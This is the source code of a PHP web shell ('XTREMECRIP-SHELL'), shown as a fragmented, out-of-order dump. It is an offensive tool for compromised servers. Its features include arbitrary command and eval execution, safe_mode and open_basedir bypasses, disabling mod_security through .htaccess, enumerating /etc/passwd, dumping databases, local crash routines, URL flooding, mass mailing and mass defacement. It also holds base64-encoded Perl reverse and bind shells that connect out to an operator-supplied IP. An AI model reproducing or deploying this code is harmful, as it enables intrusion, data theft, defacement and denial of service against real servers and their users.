"; } function querY($type,$host,$user,$pass,$db='',$query){ $res=''; switch($type){ case 'MySQL': if(!function_exists('mysql_connect'))return 0; $link=mysql_connect($host,$user,$pass); if($link){ if(!empty($db))mysql_select_db($db,$link); $result=mysql_query($query,$link); if ($result!=1){ while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|- |',$data).'|+|+|+|+|+|'; $res.='[+][+][+]'; for($i=0;$i '; curl_close($ch); } if ($_REQUEST['bypcu']){ bypcu($_REQUEST['bypcu']); } if($_REQUEST['do']=="bypasscmd"){ if($_POST['bycw']){ echo $_POST['bycw']; $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll'); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw'].""); $stdout = $exec->StdOut(); $stcom = $stdout->ReadAll();} echo $head.'


Bypass Safe_Mode And Disable_Functions In Windows Server
'.$formp.'Command
Bypass Safe_Mode Windows Server
'.$formp.'Command
'.$end;exit;; } if($_REQUEST['do']=="bypassdir"){ if($_POST['byoc']){ if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){ $bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder"; }else{$bopens="Can Not Bypass This";} } if($_POST['byfc']){ curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__); $debfc=curl_exec($ch); } if($_POST['byetc']){ for($bye=0;$bye<40000;$bye++){ $sbep =$sbep. posix_getpwuid($bye); }} if($_POST['byfc9']){ echo "not sucsfull"; } if($_REQUEST['bysyml']){ $file=$_REQUEST['bysyml']; bywsym($file); } echo $head.'


Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2
'.$formp.'Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4
'.$formp.'Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9
'.$formp.'Address File

Bypass /Etc/Passwd
'.$formp.'
Bypass With ini_restore'.$formp.'
Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink
'.$formp.'

'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9
'.$formp.'
'.$end;exit;; } function printdrive(){ global $slash; foreach (range("A","Z") as $tempdrive) { if (is_dir($tempdrive.":".$slash)){ $adri=$tempdrive.":".$slash; $drivea=$drivea.''.$tempdrive.':'.$slash.' '; } } return $drivea; } if($_POST['nameren'] && $_POST['addressren']){ if(is_writable($_REQUEST['addressren'])){ rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !"); }else{alert("Permission Denied !");} } if($_GET['do']=="delete"){ if ($_GET['type']=="dir"){ if(is_writable($_REQUEST['address'])){ $dir=$_GET['address'].$_GET['filename']; deleteDirectory($dir); alert("Deleted Successful !"); }else{alert("Permission Denied !");} }elseif($_GET['type']=="file"){ if(is_writable($_GET['address'].$_GET['filename'])){ unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !"); }else{alert("Permission Denied !");} } } if($_POST['fedit'] && $_POST['namefe']){ if(is_writable($_REQUEST['address'])){ $opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w"); fwrite($opensave,html_entity_decode($_POST['fedit'])); fclose($opensave);alert("File Saved Successful !"); }else{alert("Permission Denied !");} } if ($_POST['evalsource']){ eval($_POST['evalsource']); } if($_GET['do']=="eval"){ echo $head.$formp.$nowaddress.'


'.$end;exit; } if($_GET['do']=="info"){ if(ini_get('register_globals')){ $registerg="Enable"; }else{ $registerg="disable"; } if(extension_loaded('curl')){ $curls="Enable"; }else{ $curls="disable"; } if(@function_exists('mysql_connect')){ $db_on = "Mysql : On"; }; if(@function_exists('mssql_connect')){ $db_on = "Mssql : On"; }; if(@function_exists('pg_connect')){ $db_on = "PostgreSQL : On"; };if(@function_exists('ocilogon')){ $db_on = "Oracle : On"; }; echo $head."Operating System : ".php_uname()."
Server Name : ".$_SERVER['HTTP_HOST']."
Disable_Functions : ".$disablef."
Safe_Mode : ".$safe_modes."
Openbase_dir : ".ini_get('openbase_dir')."
Php Version : ".phpversion()."
Free Space : ".sizee(disk_free_space("/"))."
Total Space : ".sizee(disk_total_space("/"))."
Register_Globals : ".$registerg."
Curl : ".$curls."
Database ".$db_on."
Server Name : ".$_SERVER['HTTP_HOST']."
Admin Server : ".$_SERVER['SERVER_ADMIN'].$end; exit; } if ($_GET['do']=="cmd"){ echo $head.'

'.$end;exit;} if ($_GET['do']=="symlink"){ echo $head.'

SymLink With PHP
TO


SymLink With OS :
TO

'.$end;exit;} if ($_POST['ad1syp'] && $_POST['ad2syp']){ if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){ alert("Symlink Worked !"); }else{ alert("Symlink Not Worked !"); }} if ($_POST['ad1syc'] && $_POST['ad2syc']){ if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){ alert("Symlink Worked !"); }else{alert("Symlink Not Worked !");} } if ($_GET['do']=="d0slocal"){ echo $head.'

If You Click This Link This Server Crashed.
This Worked In Php 5.3.x : Dos This Server I Am Sure
This Worked In Php 4.x.x And 5.2.9 : Dos This Server I Am Sure '.$end;exit;} if ($_GET['dosthisserver']=="1"){ function dosserver(){ $junk=str_repeat("9999999999999999999999999999999999999999999 9999999",99999); for($i=0;$i<2;){ $buff=bcpow($junk, '3', 2); $buff=null; } } dosserver(); } if ($_GET['dosthisserver']=="2"){ function cx(){cx();} cx(); } if ($_GET['do']=="convert"){ $hash=null; if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){ $hash=md5($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){ $hash=sha1($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){ $hash=crc32($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){ $hash=base64_encode($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){ $hash=base64_decode($_GET['stringtoh']); } echo $head.'

Convert

'.$end;exit;} if ($_GET['do']=="dump"){ echo $head.'

'; echo '

Backup Database

DB Type:
Server:
Username:
Password:
Data Base Name:

'.$end;exit;} if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "Dump-$dbname-$date"; $method = $_POST['method']; if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } function write($data) { global $fp; if ($_POST['method']=='sql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }} mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='sql'){ fclose ($fp); }else{ gzclose($fp);} header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } if ($_GET['do']=="mail"){ echo $head.'

Address :

Subject :



Number For Send :

'.$end;exit;} if ($_POST['admail'] && $_POST['submail'] ){ for($mi=0;$miChmod
To
".$end;exit; } /* if($_GET['do']=="edit"){ if($_GET['filename']=="dir"){ if(is_readable($_GET['address'])){ chdir($_GET['address']);}else{alert("Permission Denied !");} }} */ $araddresss=explode($slash,getcwd()); $matharrayy=count($araddresss)-1; $addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss); for($countback=0;$countback=1){ $rr=str_replace($basep,"",getcwd()); $rr=str_replace("\\","/",$rr); $diropen=''.$parsef.''; }else{ $diropen=''.$parsef.''; } return $diropen; } if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']) {$ifget=$_POST['address'];} if($cwd==''){$cwd=getcwd();}$nowaddress=''; $ad=getcwd(); $hand=opendir("$ad"); $coi=0; $coi2=0; while (false !== ($fileee = readdir($hand))) { if ($fileee != "." && $fileee != "..") { if (filetype($fileee)=="dir"){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"'; } $coi++; $fil=$fil.'

'.$fileee.'

'.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'DL Ren Del
' ;} else{ if ($coi2 %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"'; } $coi2++; $file=$file.'

'.openf($fileee).'

'.sizee(filesize($fileee)).''.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'EditDL Ren Del
' ;} } } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$fil.$file.'

'.$formg.'Command Execute :

'.$formg.'Change Dir :

'.$formg.'Create Dir :

'.$formg.'Create File :

'.$for - lol lol

"; $formg="
"; $nowaddress=''; if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) { if(move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"] ["name"])){ alert("File Upload Successful"); }else{ alert("Permission Denied !"); } } if(ini_get('disable_functions')){ $disablef=ini_get('disable_functions'); }else{ $disablef="All Functions Enable"; } if(ini_get('safe_mode')){ $safe_modes="On"; }else{ $safe_modes="Off"; } if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){ if (chmod($_POST['chmode'],"0".$_POST['chmodenum'])){alert("Chmod Ok!");}else{alert("Permission Denied !");} } $picdir='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAAB 30lEQVR42mNggAAuIBZCwjxAzMiAC4jIykrZOLplhcWlzAuLS50PwkFRiTPl1T QDBSQk7OFYRMSejY1NA6iFiUFEUinKwS/mcURW1f9wIA7NrPwflFr63zow7bO Jd9IbQ8/EN7qucW+0XOLeyJv5XmETU9RjUDV03BlX2P43oaz/f2hO+3+v5Pr/ DlEV/81Div/r+eT+V3PL+C/tlvefP6Lzv6BRyD82ce1IBl07/zNJFf3/Eyon/Q8v7v uf0LPqf3Dt7P9mYWX/1YMr/oslTfrPnzjpv4h92n8Bo7D/rJJ6eQyS5n63PLJa/wc U9f33K+z9H9O7+n/TiRf/7Xp3/Ods3v9fJGnif3H37P/Cjqn/+azj/7PIGrQxsBn7 P+V2yfzP45bzn9c9979cZN3/1LUX/ktMvfiftfnQf8Gw+v8C3vn/+Txy/3O7Zv1n VjCZx8DqkPCWw7/0PwgLRtb/d+vf/F+3fPZ/jtDa/0y1O/4zVW76zx5c/R+mhlnFf BsDm3fOZ/bIhv+cMU3/pXIm/xdK7f4P4oMwW0zLf7bEnv/s0c1wMSY953MMQ nG1P5UKJ/8nFgvaBz9jYPTJfM2c2PqfWMxoGfCFgUFGK4pBw3wh0VhCuRSUkli gaY9YzAIA/X/3S1/5EEMAAAAASUVORK5CYII='; $picfile='iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAYAAABy6+R8AAA BaElEQVR42mMIXfWfef7JT7Yrz34o33ABhj9BaKDYrP3PE6IqpgkyoINNFz9Gn nzw/f/NFz8w8JYrX//P2H6zMrByijCKpl1XPkbee/Xt//fv3zHw/ltf/x+4/vnT7O036w OzkTSuP/cu8sazz/+/fPmCgS8++vx/25XP/xcceP4xr2dLPFA5M1jTytPvIq88/vj /40fc+Oz15//LOxZXAZVzgDUtO/E68tLDD/8/fMCB33/4f/rqs/8lLQur4ZoWH3s deeH+h//v37/Hjt+9/3/yytP/RU1ImuYefh159u67/2/fvsWK37x58//4pSf/C9A1n b7z9v/r169x4mOXHv/PQ9a0AOi8M3cgJmLDIE0nLj9Bdd6CYy8iz94BKniNBb +B0CdBmpADonP9/cjlBx7/333q8f89p9HwGaA4kF665/7/lGqkIHfwKRax9Yh1t 3IICLZ1CApBx1ZAbGIbECwlr28IVM4KAPZgwQxbJyVoAAAAAElFTkSuQmC C'; $head=' XTREMECRIP-SHELL
Operation System : '.php_uname().' | Php Version : '.phpversion().' | Safe Mode : '.$safe_modes.'
'; $end='

'.base64_decode("WFRSRU1FQ1JJUC1TSEVMTCBDT0RFRCBCWSBYVF JFTUVDUklQIEFORCBUSEUtSElUTUFO").'
'.base64_decode("VEVBTTokJCQkJFhUUkVNRUNSSVAuT1JHJCQkJ CQ=").'

'; $deny=$head."

Oh My God!
Permission Denied".$end; function alert($text){ echo ""; } if ($_GET['do']=="edit" && $_GET['filename']!="dir"){ if(is_readable($_GET['address'].$_GET['filename'])){ $opedit=fopen($_GET['address'].$_GET['filename'],"r"); while(!feof($opedit)) $data.=fread($opedit,9999); fclose($opedit); echo $head.$formp.$nowaddress.'

File Name : '.$_GET['address'].$_GET['filename'].'


'.$end;exit; }else{alert("Permission Denied !");}} function sizee($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } if($_REQUEST['do']=='about'){ echo $head."

xtremeshell, xsl Security Research & Penetration Testing Team
Version 1.1
Last Update : 2010/10/10
Coded By : xtremecrip(the-hitmna)
Special Thanks( team xtremecrip.org )
Home Page : http'>xtremecrip Shell
Forum : http://www.xtremecrip.org


 SHELL BY XC0D3



".$end;exit; } function deleteDirectory($dir) { if (!file_exists($dir)) return true; if (!is_dir($dir) || is_link($dir)) return unlink($dir); foreach (scandir($dir) as $item) { if ($item == '.' || $item == '..') continue; if (!deleteDirectory($dir . "/" . $item)) { chmod($dir . "/" . $item, 0777); if (!deleteDirectory($dir . "/" . $item)) return false; };}return rmdir($dir);} function download($fileadd,$finame){ $dlfilea=$fileadd.$finame; header("Content-Disposition: attachment; filename=" . $finame); header("Content-Type: application/download"); header("Content-Length: " . filesize($dlfilea)); flush(); $fp = fopen($$dlfilea, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } if($_GET['do']=="rename"){ echo $head.$formp.$nowaddress.'

To

'.$end;exit; } if ($_GET['byapache']=='ofms'){ $fse=fopen(getcwd().$slash.".htaccess","w"); fwrite($fse,' Sec------Engine Off Sec------ScanPOST Off '); fclose($fse); }elseif ($_GET['byapache']=='bysap'){ $fse=fopen(getcwd().$slash.".htaccess","w"); fwrite($fse,'Options +FollowSymLinks DirectoryIndex Persian-Gulf-For-Ever.html'); fclose($fse); }elseif ($_GET['byapache']=='sfadf'){ $fse=fopen(getcwd().$slash."php.ini","w"); fwrite($fse,'safe_mode=OFF disable_functions=NONE'); fclose($fse); } if($_GET['do']=="apache"){ echo $head.$formg.$nowaddress.'


'.$end;exit; } if($_GET['do']=="dd0s"){ echo $head.$formg.$nowaddress.'

Address : Time :

'.$end;exit; } if($_GET['urldd0'] && $_GET['timedd0']){ for ($id=0;$$id<$_GET['timedd0'];$id++){ $fp=null; $contents=null; $fp=fopen($_GET['urldd0'],"rb"); while (!feof($fp)) { $contents .= fread($fp, 8192); } fclose($fp); }} if($_GET['do']=="dlfile"){ echo $head.$formp.$nowaddress.'

Download Remote File!
Address :
Save To :

'.$end;exit; } function dirpe($addres){ global $slash; $idd=0; if ($dirhen = @opendir($addres)) { while ($file = readdir($dirhen)) { $permdir=str_replace('//','/',$addres.$slash.$file); if($file!='.' && $file!='..' && is_dir($permdir)){ if (is_writable($permdir)) { $dirdata[$idd]['filename']=$permdir; $idd++; } dirpe($permdir); } } closedir($dirhen); } else { return ("notperm"); } if ($dirdata){ return $dirdata; }else{ return "notfound"; } } function dirpmass($addres,$massname,$masssource){ global $slash; $idd=0; if ($dirhen = @opendir($addres)) { while ($file = readdir($dirhen)) { $permdir=str_replace('//','/',$addres.$slash.$file); if($file!='.' && $file!='..' && is_dir($permdir)){ if (is_writable($permdir)) { if ($fm=fopen($permdir.$slash.$massname,"w")){ fwrite($fm,$masssource); fclose($fm); $dirdata[$idd]['filename']=$permdir; } $idd++; } dirpmass($permdir); } } closedir($dirhen); } else { return ("notperm"); } if ($dirdata){ return $dirdata; }else{ return "notfound"; } } if($_GET['do']=="perm"){ echo $head.$formp.'

Find All Folder Writeable

'.$end;exit; } if ($_POST['affw']){ $arrfilelist=dirpe($_POST['affw']); if ($arrfilelist=='notfound'){ alert("Not Found !"); }elseif($arrfilelist=='notperm'){ alert("Permission Denied !"); }else{ foreach ($arrfilelist as $tmpdir){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"';} $coi++; $permdir=$permdir.'

'.$tmpdir['filename'].'

'; } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$permdir.'
'.$end;exit; }} if($_GET['do']=="mass"){ echo $head.$formp.'

[Mass Deface]


'.$end;exit; } if ($_POST['mffw']){ $arrfilelist=dirpmass($_POST['mffw'],$_POST['massname'],$_POST['masssou rce']); if ($arrfilelist=='notfound'){ alert("Not Found !"); }elseif($arrfilelist=='notperm'){ alert("Permission Denied !"); }else{ foreach ($arrfilelist as $tmpdir){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"';} $coi++; $permdir=$permdir.'

'.$formg.'Change Directory
Upload --->  
'.$nowaddress.'
'.$ifupload.'
'.$formp.'Chmod ---->   File :
  Permission :
'.$formp.'Create Dir ----> Dirctory Name '.$nowaddress.'
'.$formp.'Create File ----> Name File '.$nowaddress.'
'.$formp.'Copy ---->   File : To Directory

'.$tmpdir['filename'].'

'; } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$permdir.'
'.$end;exit; }} if($_POST['adlr'] && $_POST['adsr']){ $url = $_POST['adlr']; $newfname = $_POST['adsr'] . basename($url); $file = fopen ($url, "rb"); if ($file) { $newf = fopen ($newfname, "wb"); if ($newf) while(!feof($file)) { fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 ); } alert("File Downloaded Success"); }else{alert("Can Not Open File");} if ($file) { fclose($file); } if ($newf) { fclose($newf); } } if($_GET['do']=="down" and $_GET['type']=='file'){ download($_GET['address'],$_GET['filename']);} if($_GET['do']=="down" and $_GET['type']=='dir'){ class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function add_dir($name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x0a\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00"; $fr .= "\x00\x00\x00\x00"; $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("V",0); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x0a\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("V",0); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $ext = "\x00\x00\x10\x00"; $ext = "\xff\xff\xff\xff"; $cdrec .= pack("V", 16 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function add_file($data, $name) { $name = str_replace("\\", "/", $name); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= "\x00\x00\x00\x00"; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr( substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $fr .= pack("v", strlen($name) ); $fr .= pack("v", 0 ); $fr .= $name; $fr .= $zdata; $fr .= pack("V",$crc); $fr .= pack("V",$c_len); $fr .= pack("V",$unc_len); $this -> datasec[] = $fr; $new_offset = strlen(implode("", $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .="\x00\x00"; $cdrec .="\x14\x00"; $cdrec .="\x00\x00"; $cdrec .="\x08\x00"; $cdrec .="\x00\x00\x00\x00"; $cdrec .= pack("V",$crc); $cdrec .= pack("V",$c_len); $cdrec .= pack("V",$unc_len); $cdrec .= pack("v", strlen($name) ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("v", 0 ); $cdrec .= pack("V", 32 ); $cdrec .= pack("V", $this -> old_offset ); $this -> old_offset = $new_offset; $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode("", $this -> datasec); $ctrldir = implode("", $this -> ctrl_dir); return $data. $ctrldir. $this -> eof_ctrl_dir. pack("v", sizeof($this -> ctrl_dir)). pack("v", sizeof($this -> ctrl_dir)). pack("V", strlen($ctrldir)). pack("V", strlen($data)). "\x00\x00"; } } $dlfolder=$_GET['address'].$slash.$_GET['dirname'].$slash; $zipfile = new zipfile(); function get_files_from_folder($directory, $put_into) { global $zipfile; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (is_file($directory.$file)) { $fileContents = file_get_contents($directory.$file); $zipfile->add_file($fileContents, $put_into.$file); } elseif ($file != '.' and $file != '..' and is_dir($directory.$file)) { $zipfile->add_dir($put_into.$file.'/'); get_files_from_folder($directory.$file.'/', $put_into.$file.'/'); } } } closedir($handle); } $datedl=date("y-m-d"); get_files_from_folder($dlfolder,''); header("Content-Disposition: attachment; filename=" . $_GET['dirname']."- ".$datedl.".zip"); header("Content-Type: application/download"); header("Content-Length: " . strlen($zipfile -> file())); flush(); echo $zipfile -> file(); $filename = $_GET['dirname']."-".$datedl.".zip"; $fd = fopen ($filename, "wb"); $out = fwrite ($fd, $zipfile -> file()); fclose ($fd); } if ($_REQUEST['cdirname']){ if(mkdir($_REQUEST['cdirname'],"0777")){alert("Directory Created !");}else{alert("Permission Denied !");}} function bcn($ipbc,$pbc){ $bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZX JsLiBTaGFkb3cxMjAgLSB3 NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRw b3J0ID0gJEFSR1Zb MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdl OiBwZXJsIHNjcmlw dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIls rXSBDb25uZWN0aW5n IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgI yBZb3UgY2FuIGNo YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIF NPQ0tfU1RSRUFN LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKa WYgKCFjb25uZWN0 KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9z dCkpKSB7ZGll KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI +JlNFUlZFUiIpOwog IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNF UlZFUiIpOwogIGV4 ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow=="; $opbc=fopen("bcc.pl","w"); fwrite($opbc,base64_decode($bcperl)); fclose($opbc); system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } function wbp($wb){ $wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V 0cHJvdG9ieW5hbWUoJ3Rj cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJ HByb3RvKTsKc2V0c29j a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygi bCIsIDEpKTsKYmlu ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxp c3RlbihTRVJWRVIs IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNF UlZFUik7IGNsb3Nl IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERP VVQsICI+JkNMSUVO VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV 4ZScpOwpjbG9zZShT VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g"; $opwb=fopen("wbp.pl","w"); fwrite($opwb,base64_decode($wbp)); fclose($opwb); echo getcwd(); system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } function lbp($wb){ $lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF0 7JHByb3RvPWdldHByb3Rv YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZF UiwgUEZfSU5FVCwg U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9 TT0NLRVQsIFNPX1JF VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4 oJHBvcnQsIElO QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7IC RwYWRkciA9IGFjY2Vw dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4 mQ0xJRU5UIik7 b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTEl FTlQiKTtzeXN0ZW0o Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVE RFUlIpO30g"; $oplb=fopen("lbp.pl","w"); fwrite($oplb,base64_decode($lbp)); fclose($oplb); system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode"); } if($_REQUEST['portbw']){ wbp($_REQUEST['portbw']); }if($_REQUEST['portbl']){ lbp($_REQUEST['portbl']); } if($_REQUEST['ipcb'] && $_REQUEST['portbc']){ bcn($_REQUEST['ipcb'],$_REQUEST['portbc']); } if($_REQUEST['do']=="bc"){ echo $head.$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Back Connect >>>>>>
Ip Address : Port :
".$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Windows Bind Port >>>>>>
Port :
".$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Linux Bind Port >>>>>>
Port :
".$end;exit; } function copyf($file1,$file2,$filename){ global $slash; $fpc = fopen($file1, "rb"); $source = ''; while (!feof($fpc)) { $source .= fread($fpc, 8192); } fclose($fpc); $opt = fopen($file2.$slash.$filename, "w"); fwrite($opt, $source); fclose($opt); } if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){ if(is_writable($_REQUEST['cpyto'])){ echo $_REQUEST['address']; copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST[' cpyto'],$_REQUEST['copyname']); }else{alert("Permission Denied !");}} if($_REQUEST['cfilename']){ echo $head.$formp.$nowaddress.'

Create File


'.$end;exit; } if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){ if($ofile4c=fopen($_REQUEST['nf4c'],"w")){ fwrite($ofile4c,$_REQUEST['nf4cs']); fclose($ofile4c); alert("File Saved !");}else{alert("Permission Denied !");}} function sqlclienT(){ global $t,$errorbox,$et,$hcwd; if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUE ST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB']; $_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST[' typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUE ST['useR']; } if (isset ($_GET[select_db])){ $getdb=$_GET[select_db]; $_SESSION[db]=$getdb; $query="SHOW TABLES"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[select_tbl])){ $tbl=$_GET[select_tbl]; $_SESSION[tbl]=$tbl; 